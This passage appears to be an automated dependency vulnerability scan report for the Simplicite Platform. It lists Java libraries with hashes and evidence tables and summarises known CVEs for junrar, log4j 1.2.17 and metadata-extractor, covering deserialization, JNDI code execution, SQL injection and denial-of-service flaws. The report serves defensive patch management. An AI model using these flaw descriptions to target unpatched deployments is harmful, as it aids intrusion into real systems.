Vendor | pom | artifactid | junit | Highest
Vendor | pom | artifactid | junit | Low
Vendor | pom | developer email | david@saff.net | Low
Vendor | pom | developer email | kcooney@google.com | Low
Vendor | pom | developer email | mail@marcphilipp.de | Low
Vendor | pom | developer email | mail@stefan-birkner.de | Low
Vendor | pom | developer id | dsaff | Medium
Vendor | pom | developer id | kcooney | Medium
Vendor | pom | developer id | marcphilipp | Medium
Vendor | pom | developer id | stefanbirkner | Medium
Vendor | pom | developer name | David Saff | Medium
Vendor | pom | developer name | Kevin Cooney | Medium
Vendor | pom | developer name | Marc Philipp | Medium
Vendor | pom | developer name | Stefan Birkner | Medium
Vendor | pom | groupid | junit | Highest
Vendor | pom | name | JUnit | High
Vendor | pom | organization name | JUnit | High
Vendor | pom | organization url | http://www.junit.org | Medium
Vendor | pom | url | http://junit.org | Highest
Product | file | name | junit | High
Product | jar | package name | framework | Highest
Product | jar | package name | junit | Highest
Product | Manifest | automatic-module-name | junit | Medium
Product | Manifest | Implementation-Title | JUnit | High
Product | Manifest | implementation-url | http://junit.org | Low
Product | pom | artifactid | junit | Highest
Product | pom | developer email | david@saff.net | Low
Product | pom | developer email | kcooney@google.com | Low
Product | pom | developer email | mail@marcphilipp.de | Low
Product | pom | developer email | mail@stefan-birkner.de | Low
Product | pom | developer id | dsaff | Low
Product | pom | developer id | kcooney | Low
Product | pom | developer id | marcphilipp | Low
Product | pom | developer id | stefanbirkner | Low
Product | pom | developer name | David Saff | Low
Product | pom | developer name | Kevin Cooney | Low
Product | pom | developer name | Marc Philipp | Low
Product | pom | developer name | Stefan Birkner | Low
Product | pom | groupid | junit | Highest
Product | pom | name | JUnit | High
Product | pom | organization name | JUnit | Low
Product | pom | organization url | http://www.junit.org | Low
Product | pom | url | http://junit.org | Medium
Version | file | version | 4.13.2 | High
Version | Manifest | Implementation-Version | 4.13.2 | High
Version | pom | version | 4.13.2 | Highest
juniversalchardet-1.0.3.jar
Description: Java port of universalchardet
License: Mozilla Public License 1.1 (MPL 1.1): http://www.mozilla.org/MPL/MPL-1.1.html
File Path: /var/simplicite/.m2/repository/com/googlecode/juniversalchardet/juniversalchardet/1.0.3/juniversalchardet-1.0.3.jar
MD5: d9ea0a9a275336c175b343f2e4cd8f27
SHA1: cd49678784c46aa8789c060538e0154013bb421b
SHA256: 757bfe906193b8b651e79dc26cd67d6b55d0770a2cdfb0381591504f779d4a76
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | juniversalchardet | High
Vendor | jar | package name | mozilla | Low
Vendor | jar | package name | prober | Low
Vendor | jar | package name | universalchardet | Highest
Vendor | jar | package name | universalchardet | Low
Vendor | pom | artifactid | juniversalchardet | Highest
Vendor | pom | artifactid | juniversalchardet | Low
Vendor | pom | developer email | takscape@gmail.com | Low
Vendor | pom | developer id | takscape | Medium
Vendor | pom | groupid | com.googlecode.juniversalchardet | Highest
Vendor | pom | name | juniversalchardet | High
Vendor | pom | url | http://juniversalchardet.googlecode.com/ | Highest
Product | file | name | juniversalchardet | High
Product | jar | package name | prober | Low
Product | jar | package name | universalchardet | Highest
Product | jar | package name | universalchardet | Low
Product | pom | artifactid | juniversalchardet | Highest
Product | pom | developer email | takscape@gmail.com | Low
Product | pom | developer id | takscape | Low
Product | pom | groupid | com.googlecode.juniversalchardet | Highest
Product | pom | name | juniversalchardet | High
Product | pom | url | http://juniversalchardet.googlecode.com/ | Medium
Version | file | version | 1.0.3 | High
Version | pom | version | 1.0.3 | Highest
junrar-4.0.0.jar
Description: rar decompression library in plain java
License: UnRar License: https://raw.github.com/junrar/junrar/master/license.txt
File Path: /var/simplicite/.m2/repository/com/github/junrar/junrar/4.0.0/junrar-4.0.0.jar
MD5: 38103347e0c3e06ee52ce032cee9e902
SHA1: 93f9b74e1507db9c55c5bdd35369376a474e4db5
SHA256: 2eafa4571dfebe4e42e686657f9e597aaa86bb68942b590d5af9902e7caddb20
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | junrar | High
Vendor | jar | package name | github | Highest
Vendor | jar | package name | junrar | Highest
Vendor | Manifest | mode | development | Low
Vendor | Manifest | url | https://github.com/junrar/junrar | Low
Vendor | pom | artifactid | junrar | Highest
Vendor | pom | artifactid | junrar | Low
Vendor | pom | developer id | edmund_wagner | Medium
Vendor | pom | developer name | Edmund Wagner | Medium
Vendor | pom | groupid | com.github.junrar | Highest
Vendor | pom | name | Java UnRar | High
Vendor | pom | url | junrar/junrar | Highest
Product | file | name | junrar | High
Product | jar | package name | github | Highest
Product | jar | package name | junrar | Highest
Product | Manifest | mode | development | Low
Product | Manifest | url | https://github.com/junrar/junrar | Low
Product | pom | artifactid | junrar | Highest
Product | pom | developer id | edmund_wagner | Low
Product | pom | developer name | Edmund Wagner | Low
Product | pom | groupid | com.github.junrar | Highest
Product | pom | name | Java UnRar | High
Product | pom | url | junrar/junrar | High
Version | file | version | 4.0.0 | High
Version | pom | version | 4.0.0 | Highest
CVE-2022-23596
Junrar is an open source Java RAR archive library. In affected versions, a carefully crafted RAR archive can trigger an infinite loop while extracting said archive. The impact depends solely on how the application uses the library, and whether files can be provided by malicious users. The problem is patched in 7.4.1. There are no known workarounds and users are advised to upgrade as soon as possible.
CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
jzlib-1.1.1.jar
Description: JZlib is a re-implementation of zlib in pure Java
License: Revised BSD: http://www.jcraft.com/jzlib/LICENSE.txt
File Path: /var/simplicite/.m2/repository/com/jcraft/jzlib/1.1.1/jzlib-1.1.1.jar
MD5: 553b605c56ec6f508ab46ed026e21622
SHA1: a1551373315ffc2f96130a0e5704f74e151777ba
SHA256: 5cb1e9f9cf0be011487545694ff0a178237c6bfcbb21c97865cdc52c60b9347a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | jzlib | High
Vendor | jar | package name | jcraft | Highest
Vendor | jar | package name | jcraft | Low
Vendor | jar | package name | jzlib | Highest
Vendor | jar | package name | jzlib | Low
Vendor | pom | artifactid | jzlib | Highest
Vendor | pom | artifactid | jzlib | Low
Vendor | pom | developer email | ymnk at jcraft D0t com | Low
Vendor | pom | developer id | ymnk | Medium
Vendor | pom | developer name | Atsuhiko Yamanaka | Medium
Vendor | pom | developer org | JCraft,Inc. | Medium
Vendor | pom | developer org URL | http://www.jcraft.com/ | Medium
Vendor | pom | groupid | com.jcraft | Highest
Vendor | pom | name | JZlib | High
Vendor | pom | organization name | JCraft,Inc. | High
Vendor | pom | organization url | http://www.jcraft.com/ | Medium
Vendor | pom | url | http://www.jcraft.com/jzlib/ | Highest
Product | file | name | jzlib | High
Product | jar | package name | jcraft | Highest
Product | jar | package name | jzlib | Highest
Product | jar | package name | jzlib | Low
Product | pom | artifactid | jzlib | Highest
Product | pom | developer email | ymnk at jcraft D0t com | Low
Product | pom | developer id | ymnk | Low
Product | pom | developer name | Atsuhiko Yamanaka | Low
Product | pom | developer org | JCraft,Inc. | Low
Product | pom | developer org URL | http://www.jcraft.com/ | Low
Product | pom | groupid | com.jcraft | Highest
Product | pom | name | JZlib | High
Product | pom | organization name | JCraft,Inc. | Low
Product | pom | organization url | http://www.jcraft.com/ | Low
Product | pom | url | http://www.jcraft.com/jzlib/ | Medium
Version | file | version | 1.1.1 | High
Version | pom | version | 1.1.1 | Highest
libphonenumber-8.12.6.jar
Description: Google's common Java library for parsing, formatting, storing and validating international phone numbers. Optimized for running on smartphones.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/googlecode/libphonenumber/libphonenumber/8.12.6/libphonenumber-8.12.6.jar
MD5: 61e2edb830516cca446822a3f2ccf77e
SHA1: ade471e53eb8c848f91dba4fdb2f462f8319220e
SHA256: c118abe8954172149c98e727c8630eda4954e048582a9e5007e3479681453e94
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | libphonenumber | High
Vendor | Manifest | bundle-docurl | http://www.google.com/ | Low
Vendor | Manifest | bundle-symbolicname | com.googlecode.libphonenumber | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Vendor | pom | artifactid | libphonenumber | Highest
Vendor | pom | artifactid | libphonenumber | Low
Vendor | pom | groupid | com.googlecode.libphonenumber | Highest
Vendor | pom | parent-artifactid | libphonenumber-parent | Low
Vendor | pom | url | google/libphonenumber/ | Highest
Product | file | name | libphonenumber | High
Product | jar | package name | google | Highest
Product | Manifest | bundle-docurl | http://www.google.com/ | Low
Product | Manifest | Bundle-Name | libphonenumber | Medium
Product | Manifest | bundle-symbolicname | com.googlecode.libphonenumber | Medium
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Product | pom | artifactid | libphonenumber | Highest
Product | pom | groupid | com.googlecode.libphonenumber | Highest
Product | pom | parent-artifactid | libphonenumber-parent | Medium
Product | pom | url | google/libphonenumber/ | High
Version | file | version | 8.12.6 | High
Version | Manifest | Bundle-Version | 8.12.6 | High
Version | pom | version | 8.12.6 | Highest
listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.jar
Description:
An empty artifact that Guava depends on to signal that it is providing
ListenableFuture -- but is also available in a second "version" that
contains com.google.common.util.concurrent.ListenableFuture class, without
any other Guava classes. The idea is:
- If users want only ListenableFuture, they depend on listenablefuture-1.0.
- If users want all of Guava, they depend on guava, which, as of Guava
27.0, depends on
listenablefuture-9999.0-empty-to-avoid-conflict-with-guava. The 9999.0-...
version number is enough for some build systems (notably, Gradle) to select
that empty artifact over the "real" listenablefuture-1.0 -- avoiding a
conflict with the copy of ListenableFuture in guava itself. If users are
using an older version of Guava or a build system other than Gradle, they
may see class conflicts. If so, they can solve them by manually excluding
the listenablefuture artifact or manually forcing their build systems to
use 9999.0-....
File Path: /var/simplicite/.m2/repository/com/google/guava/listenablefuture/9999.0-empty-to-avoid-conflict-with-guava/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.jar
MD5: d094c22570d65e132c19cea5d352e381
SHA1: b421526c5f297295adef1c886e5246c39d4ac629
SHA256: b372a037d4230aa57fbeffdef30fd6123f9c0c2db85d0aced00c91b974f33f99
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | listenablefuture | High
Vendor | pom | artifactid | listenablefuture | Highest
Vendor | pom | artifactid | listenablefuture | Low
Vendor | pom | groupid | com.google.guava | Highest
Vendor | pom | name | Guava ListenableFuture only | High
Vendor | pom | parent-artifactid | guava-parent | Low
Product | file | name | listenablefuture | High
Product | pom | artifactid | listenablefuture | Highest
Product | pom | groupid | com.google.guava | Highest
Product | pom | name | Guava ListenableFuture only | High
Product | pom | parent-artifactid | guava-parent | Medium
Version | pom | parent-version | 9999.0-empty-to-avoid-conflict-with-guava | Low
Version | pom | version | 9999.0-empty-to-avoid-conflict-with-guava | Highest
log4j-1.2.17.jar
Description: Apache Log4j 1.2
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/log4j/log4j/1.2.17/log4j-1.2.17.jar
MD5: 04a41f0a068986f0f73485cf507c0f40
SHA1: 5af35056b4d257e4b64b9e8069c0746e8b08629f
SHA256: 1d31696445697720527091754369082a6651bd49781b6005deb94e56753406f9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | log4j | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | log4j | Highest
Vendor | Manifest | bundle-docurl | http://logging.apache.org/log4j/1.2 | Low
Vendor | Manifest | bundle-symbolicname | log4j | Medium
Vendor | manifest: org.apache.log4j | Implementation-Vendor | "Apache Software Foundation" | Medium
Vendor | pom | artifactid | log4j | Highest
Vendor | pom | artifactid | log4j | Low
Vendor | pom | groupid | log4j | Highest
Vendor | pom | name | Apache Log4j | High
Vendor | pom | organization name | Apache Software Foundation | High
Vendor | pom | organization url | http://www.apache.org | Medium
Vendor | pom | url | http://logging.apache.org/log4j/1.2/ | Highest
Product | file | name | log4j | High
Product | jar | package name | apache | Highest
Product | jar | package name | log4j | Highest
Product | Manifest | bundle-docurl | http://logging.apache.org/log4j/1.2 | Low
Product | Manifest | Bundle-Name | Apache Log4j | Medium
Product | Manifest | bundle-symbolicname | log4j | Medium
Product | manifest: org.apache.log4j | Implementation-Title | log4j | Medium
Product | pom | artifactid | log4j | Highest
Product | pom | groupid | log4j | Highest
Product | pom | name | Apache Log4j | High
Product | pom | organization name | Apache Software Foundation | Low
Product | pom | organization url | http://www.apache.org | Low
Product | pom | url | http://logging.apache.org/log4j/1.2/ | Medium
Version | file | version | 1.2.17 | High
Version | Manifest | Bundle-Version | 1.2.17 | High
Version | manifest: org.apache.log4j | Implementation-Version | 1.2.17 | Medium
Version | pom | version | 1.2.17 | Highest
CVE-2019-17571
Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data, which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget while listening to untrusted network traffic for log data. This affects Log4j versions 1.2 up to 1.2.17.
CWE-502 Deserialization of Untrusted Data
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2020-9493
A deserialization flaw was found in Apache Chainsaw versions prior to 2.1.0 which could lead to malicious code execution.
CWE-502 Deserialization of Untrusted Data
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2022-23305
By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged, allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2022-23302
JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
CWE-502 Deserialization of Untrusted Data
CVSSv2: Base Score: MEDIUM (6.0) Vector: /AV:N/AC:M/Au:S/C:P/I:P/A:P
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2022-23307
CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw V2.0, Chainsaw was a component of Apache Log4j 1.2.x, where the same issue exists.
CWE-502 Deserialization of Untrusted Data
CVSSv2: Base Score: HIGH (9.0) Vector: /AV:N/AC:L/Au:S/C:C/I:C/A:C
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2021-4104 (OSSINDEX) suppress
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2021-4104 for details CWE-502 Deserialization of Untrusted Data
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:H/Au:/C:H/I:H/A:H
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:log4j:log4j:1.2.17:*:*:*:*:*:*:*
CVE-2023-26464
** UNSUPPORTED WHEN ASSIGNED **
When using the Chainsaw or SocketAppender components with Log4j 1.x on JRE less than 1.7, an attacker that manages to cause a logging entry involving a specially-crafted (i.e., deeply nested) hashmap or hashtable (depending on which logging component is in use) to be processed could exhaust the available memory in the virtual machine and achieve Denial of Service when the object is deserialized.
This issue affects Apache Log4j before 2. Affected users are recommended to update to Log4j 2.x.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
lucene-core-8.2.0.jar
Description:
Apache Lucene Java Core
File Path: /var/simplicite/.m2/repository/org/apache/lucene/lucene-core/8.2.0/lucene-core-8.2.0.jar
MD5: 38017372e81035c484ad5cf94d88d8ea
SHA1: f6da40436d3633de272810fae1e339c237adfcf6
SHA256: 25564b27cebe18a5f0e988b5aeee342e1dd163b2dfca888eb1cea4dcadb32dd2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name lucene-core High Vendor jar package name apache Highest Vendor jar package name lucene Highest Vendor jar package name org Highest Vendor Manifest extension-name org.apache.lucene Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest multi-release true Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid lucene-core Highest Vendor pom artifactid lucene-core Low Vendor pom groupid org.apache.lucene Highest Vendor pom name Lucene Core High Vendor pom parent-artifactid lucene-parent Low Product file name lucene-core High Product jar package name apache Highest Product jar package name lucene Highest Product jar package name org Highest Product jar package name search Highest Product Manifest extension-name org.apache.lucene Medium Product Manifest Implementation-Title org.apache.lucene High Product Manifest multi-release true Low Product Manifest specification-title Lucene Search Engine: core Medium Product pom artifactid lucene-core Highest Product pom groupid org.apache.lucene Highest Product pom name Lucene Core High Product pom parent-artifactid lucene-parent Medium Version file version 8.2.0 High Version pom version 8.2.0 Highest
mbassador-1.3.2.jar
Description:
Mbassador is a fast and flexible event bus system following the publish subscribe pattern.
It is designed for ease of use and aims to be feature rich and extensible while preserving resource efficiency
and performance.
It provides non-blocking iterators and minimal write contention with low memory footprint.
Some features:
declarative handler definition via annotations,
sync and/or async event delivery,
weak or strong references,
configurable event filters,
License:
MIT license: http://www.opensource.org/licenses/mit-license.php
File Path: /var/simplicite/.m2/repository/net/engio/mbassador/1.3.2/mbassador-1.3.2.jar
MD5: 6844d9220e623fa491776e38a61f29a2
SHA1: 4ebb2c5f853bf8a5f87147b186a9758d2e2ec0af
SHA256: 469e2e9c68271eadaff12483bbb1abc640ea9973af7fa0519250e04f503aca67
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name mbassador High Vendor jar package name bus Highest Vendor jar package name engio Highest Vendor jar package name net Highest Vendor Manifest bundle-symbolicname net.engio.mbassador Medium Vendor pom artifactid mbassador Highest Vendor pom artifactid mbassador Low Vendor pom developer email b.diedrichsen@googlemail.com Low Vendor pom developer id bennidi Medium Vendor pom developer name Benjamin Diedrichsen Medium Vendor pom groupid net.engio Highest Vendor pom name mbassador High Vendor pom url bennidi/mbassador Highest Product file name mbassador High Product jar package name bus Highest Product jar package name engio Highest Product jar package name net Highest Product Manifest Bundle-Name mbassador Medium Product Manifest bundle-symbolicname net.engio.mbassador Medium Product pom artifactid mbassador Highest Product pom developer email b.diedrichsen@googlemail.com Low Product pom developer id bennidi Low Product pom developer name Benjamin Diedrichsen Low Product pom groupid net.engio Highest Product pom name mbassador High Product pom url bennidi/mbassador High Version file version 1.3.2 High Version Manifest Bundle-Version 1.3.2 High Version pom version 1.3.2 Highest
mchange-commons-java-0.2.15.jar
Description:
mchange-commons-java
License:
GNU Lesser General Public License, Version 2.1: http://www.gnu.org/licenses/lgpl-2.1.html
Eclipse Public License, Version 1.0: http://www.eclipse.org/org/documents/epl-v10.html
File Path: /var/simplicite/.m2/repository/com/mchange/mchange-commons-java/0.2.15/mchange-commons-java-0.2.15.jar
MD5: 97c4575d9d49d9afb71492e6bb4417da
SHA1: 6ef5abe5f1b94ac45b7b5bad42d871da4fda6bbc
SHA256: 2b8fce65e95a3e968d5ab3507e2833f43df3daee0635ee51c7ce33343bb3a21c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name mchange-commons-java High Vendor jar package name mchange Highest Vendor Manifest Implementation-Vendor com.mchange High Vendor Manifest Implementation-Vendor-Id com.mchange Medium Vendor Manifest specification-vendor com.mchange Low Vendor pom artifactid mchange-commons-java Highest Vendor pom artifactid mchange-commons-java Low Vendor pom developer email swaldman@mchange.com Low Vendor pom developer id swaldman Medium Vendor pom developer name Steve Waldman Medium Vendor pom groupid com.mchange Highest Vendor pom name mchange-commons-java High Vendor pom organization name com.mchange High Vendor pom url swaldman/mchange-commons-java Highest Product file name mchange-commons-java High Product jar package name mchange Highest Product Manifest Implementation-Title mchange-commons-java High Product Manifest specification-title mchange-commons-java Medium Product pom artifactid mchange-commons-java Highest Product pom developer email swaldman@mchange.com Low Product pom developer id swaldman Low Product pom developer name Steve Waldman Low Product pom groupid com.mchange Highest Product pom name mchange-commons-java High Product pom organization name com.mchange Low Product pom url swaldman/mchange-commons-java High Version file version 0.2.15 High Version Manifest Implementation-Version 0.2.15 High Version pom version 0.2.15 Highest
metadata-extractor-2.11.0.jar
Description:
Java library for extracting EXIF, IPTC, XMP, ICC and other metadata from image files.
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/drewnoakes/metadata-extractor/2.11.0/metadata-extractor-2.11.0.jar
MD5: e95f394e786c0c7f22e61bff2e54ff8d
SHA1: 5f11883f6d06a16ca5fb8a9edf7c6c1237a92da0
SHA256: f5ec56c6b01afbfd7019e2da73bdec5d22c60d620c0e8043e6a85adb554d0df7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name metadata-extractor High Vendor jar package name drew Highest Vendor jar package name exif Highest Vendor jar package name icc Highest Vendor jar package name iptc Highest Vendor jar package name metadata Highest Vendor jar package name xmp Highest Vendor Manifest implementation-url https://drewnoakes.com/code/exif/ Low Vendor Manifest Implementation-Vendor Drew Noakes High Vendor Manifest Implementation-Vendor-Id com.drewnoakes Medium Vendor pom artifactid metadata-extractor Highest Vendor pom artifactid metadata-extractor Low Vendor pom developer id drewnoakes Medium Vendor pom developer name Drew Noakes Medium Vendor pom groupid com.drewnoakes Highest Vendor pom url https://drewnoakes.com/code/exif/ Highest Product file name metadata-extractor High Product jar package name exif Highest Product jar package name icc Highest Product jar package name iptc Highest Product jar package name metadata Highest Product jar package name xmp Highest Product Manifest Implementation-Title metadata-extractor High Product Manifest implementation-url https://drewnoakes.com/code/exif/ Low Product pom artifactid metadata-extractor Highest Product pom developer id drewnoakes Low Product pom developer name Drew Noakes Low Product pom groupid com.drewnoakes Highest Product pom url https://drewnoakes.com/code/exif/ Medium Version file version 2.11.0 High Version Manifest Implementation-Version 2.11.0 High Version pom version 2.11.0 Highest
CVE-2019-14262 (OSSINDEX)
MetadataExtractor 2.1.0 allows stack consumption.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.drewnoakes:metadata-extractor:2.11.0:*:*:*:*:*:*:*
CVE-2022-24613
metadata-extractor up to 2.16.0 can throw various uncaught exceptions while parsing a specially crafted JPEG file, which could result in an application crash. This could be used to mount a denial of service attack against services that use the metadata-extractor library.
CWE-755 Improper Handling of Exceptional Conditions
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-24614
When reading a specially crafted JPEG file, metadata-extractor up to 2.16.0 can be made to allocate large amounts of memory that finally leads to an out-of-memory error even for very small inputs. This could be used to mount a denial of service attack against services that use the metadata-extractor library.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
migbase64-2.2.jar
Description:
MiGBase64 is a very fast and small Base64 Codec written in Java
License:
Prior BSD License: http://en.wikipedia.org/wiki/BSD_licenses
File Path: /var/simplicite/.m2/repository/com/brsanthu/migbase64/2.2/migbase64-2.2.jar
MD5: da3ef3a9a9fa358ed789b37a3c780727
SHA1: bcc14967d516e93c527897a6c531ba76b5751faa
SHA256: 07224584b6227efbb815e96e3153945786e2a6b1a934620b6130331c2351c129
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name migbase64 High Vendor jar package name base64 Highest Vendor jar package name migbase64 Highest Vendor Manifest bundle-docurl http://sourceforge.net/projects/migbase64/ Low Vendor Manifest bundle-symbolicname com.brsanthu.migbase64 Medium Vendor Manifest Implementation-Vendor Mikael Grev High Vendor Manifest Implementation-Vendor-Id com.brsanthu Medium Vendor Manifest specification-vendor Mikael Grev Low Vendor pom artifactid migbase64 Highest Vendor pom artifactid migbase64 Low Vendor pom developer email http://sourceforge.net/u/mgrev/profile/ Low Vendor pom developer name Mikael Grev Medium Vendor pom developer org URL http://sourceforge.net/u/mgrev/profile/ Medium Vendor pom groupid com.brsanthu Highest Vendor pom name MiG Base64 High Vendor pom organization name Mikael Grev High Vendor pom organization url http://sourceforge.net/projects/migbase64/ Medium Vendor pom url http://sourceforge.net/projects/migbase64/ Highest Product file name migbase64 High Product jar package name base64 Highest Product jar package name migbase64 Highest Product Manifest bundle-docurl http://sourceforge.net/projects/migbase64/ Low Product Manifest Bundle-Name MiG Base64 Medium Product Manifest bundle-symbolicname com.brsanthu.migbase64 Medium Product Manifest Implementation-Title MiG Base64 High Product Manifest specification-title MiG Base64 Medium Product pom artifactid migbase64 Highest Product pom developer email http://sourceforge.net/u/mgrev/profile/ Low Product pom developer name Mikael Grev Low Product pom developer org URL http://sourceforge.net/u/mgrev/profile/ Low Product pom groupid com.brsanthu Highest Product pom name MiG Base64 High Product pom organization name Mikael Grev Low Product pom organization url http://sourceforge.net/projects/migbase64/ Low Product pom url http://sourceforge.net/projects/migbase64/ Medium Version file version 2.2 High Version Manifest Implementation-Version 2.2 High Version pom version 2.2 Highest
mimepull-1.9.3.jar
Description:
Provides a streaming API to access attachments parts in a MIME message.
License:
CDDL 1.1: https://glassfish.java.net/public/CDDL+GPL_1_1.html
GPL2 w/ CPE: https://glassfish.java.net/public/CDDL+GPL_1_1.html
File Path: /var/simplicite/.m2/repository/org/jvnet/mimepull/mimepull/1.9.3/mimepull-1.9.3.jar
MD5: a3ee04c11e1c613128f07d5f819196ca
SHA1: c55096ff89a27e22c2e081371d0570ac19cc6788
SHA256: 072eb5692f180ed0685705fb31c900eca0986b4523c23eefc0779e87d79eea35
Referenced In Project/Scope: Simplicite Platform:compile
